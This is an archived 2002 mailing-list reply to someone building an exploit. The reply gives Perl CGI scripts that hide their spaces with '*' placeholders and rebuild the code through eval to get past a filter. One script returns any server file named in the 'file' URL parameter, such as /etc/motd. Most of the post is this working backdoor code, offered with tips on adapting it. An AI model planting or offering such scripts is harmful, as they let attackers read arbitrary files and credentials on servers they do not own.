From: Justin Lavoie <acid_rainat_private> Date: Mon, 10 Jun 2002 00:27:05 -0500 Subject: Coding Conservative CGI Perl }I'm working on a type of exploit and in doing so I must develop a *.cgi }file that'd run on a Linux and Windows box to allow me to read or upload }file (whatever is possible) without the use of spaces! Well, what would be wrong with: --- O< --- #!/usr/bin/perl $g=q#print*"Content-type:*text/plain\n\n";print*"Test:*foo!\n";#; $g=~s/\*/chr(32)/eg;eval($g);die($@)if($@);exit(0); --- O< --- Or, to, say, read any file on a system: --- O< --- #!/usr/bin/perl $g=q#use*CGI;$q=new*CGI;open(FILE,$q->param("file"))or*die("can't*open!\n"); print("Content-type:*text/plain\n\n");print(<FILE>);exit(0);#; $g=~s/\*/chr(32)/eg;eval($g);die($@)if($@);exit(0); --- O< --- (change the MIME type as necessary) and call with .cgi?file=/etc/motd In this case, you'd replace every space with a * between the two hash marks, and you would have to escape any hash mark or backslash you had, but as you'll notice, you can do anything you'd like and have it convert on the fly. You could even change the * to any other character if you'd like. Perl is very forgiving about most environments, and you can get around most restrictions if you try. -Pete K -- Pete Krawczyk petek at bsod dot net
This archive was generated by hypermail 2b30 : Mon Jun 10 2002 - 13:27:00 PDT